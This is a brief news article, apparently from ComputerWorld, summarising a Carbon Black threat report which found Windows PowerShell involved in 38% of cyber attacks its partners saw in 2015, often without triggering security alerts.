Windows PowerShell Tied to More Than a Third of Cyber Attacks
Microsoft’s Windows PowerShell configuration management framework was used to launch 38% of cyber attacks seen by security firm Carbon Black and its partners in 2015, a report has revealed.
Security experts had warned that PowerShell had been fully weaponised in the past year – but Carbon Black’s first unified threat report quantifies the risk for the first time.
The report is based on data from 1,100 cyber security incidents investigated by 28 firms managed service providers and incident response firms in the Carbon Black partner programme, including BTB Security, EY, Kroll, Optiv, Rapid7 and Red Canary.
More than two thirds of the firms taking part in the study said that they had encountered PowerShell exploits in the past year.
The increased use of PowerShell exploitation supports a growing industry trend of malware authors experimenting with ways of evading detection by exploiting operating system (OS) tools, the report said.
Attacks using PowerShell are very effective in remaining undetected, with 31% of Carbon Black partners reporting that PowerShell-related incidents had triggered no security alerts, indicating that attackers are succeeding in using PowerShell to enter and remain undetected in a company’s system.
Most PowerShell attacks took the form of basic or opportunistic threats, using commodity malware attacks such as click-fraud, fake antivirus and ransomware, while 13% of the attacks involving PowerShell appeared to be targeted or “advanced”.
Source | ComputerWorld